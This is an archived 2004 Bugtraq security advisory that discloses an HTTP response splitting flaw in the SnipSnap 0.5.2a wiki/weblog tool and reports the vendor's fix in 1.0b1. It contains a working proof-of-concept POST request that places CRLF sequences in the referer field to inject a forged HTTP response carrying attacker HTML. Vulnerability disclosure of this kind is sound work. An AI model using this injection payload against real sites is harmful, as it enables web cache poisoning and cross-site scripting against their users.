| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040914174719.50D283384C@ws7-3.us4.outblaze.com>
Date: Tue, 14 Sep 2004 12:47:19 -0500
From: "Maestro De-Seguridad" <maestrodeseguridad@...os.com>
To: bugtraq@...urityfocus.com
Subject: ADVISORY: http response splitting in snipsnap
ADVISORY
Author: Maestro (me!)
Date: 14-SEP-04
Vendor: SnipSnap (www.snipsnap.org)
Product: SnipSnap 0.5.2a
Product description (from vendor website):
SnipSnap is a free and easy to install weblog and wiki tool written in Java.
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) -
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197
referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%
0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%
0a%0d%0a{html}0wned!!{/html}&cancel=cancel
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor fixed in version 1.0B1. From vendor website:
Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released
SnipSnap version 1.0b1 has just been released. This release was necessary due to the demand to get updates from 0.5.2a and a security issue know as HTTP response splitting found by someone called Maestro De-Seguridad.
--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10
Powered by blists - more mailing lists